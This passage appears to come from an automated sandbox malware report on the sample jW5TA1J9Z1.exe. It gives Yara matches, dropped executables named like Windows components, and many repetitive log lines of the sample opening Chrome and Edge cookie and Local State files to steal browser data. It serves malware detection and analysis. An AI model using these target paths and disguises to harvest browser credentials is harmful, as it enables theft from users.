                              Source: Yara matchFile source: 0.0.jW5TA1J9Z1.exe.630000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\AppReadiness\RuntimeBroker.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, type: DROPPED
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
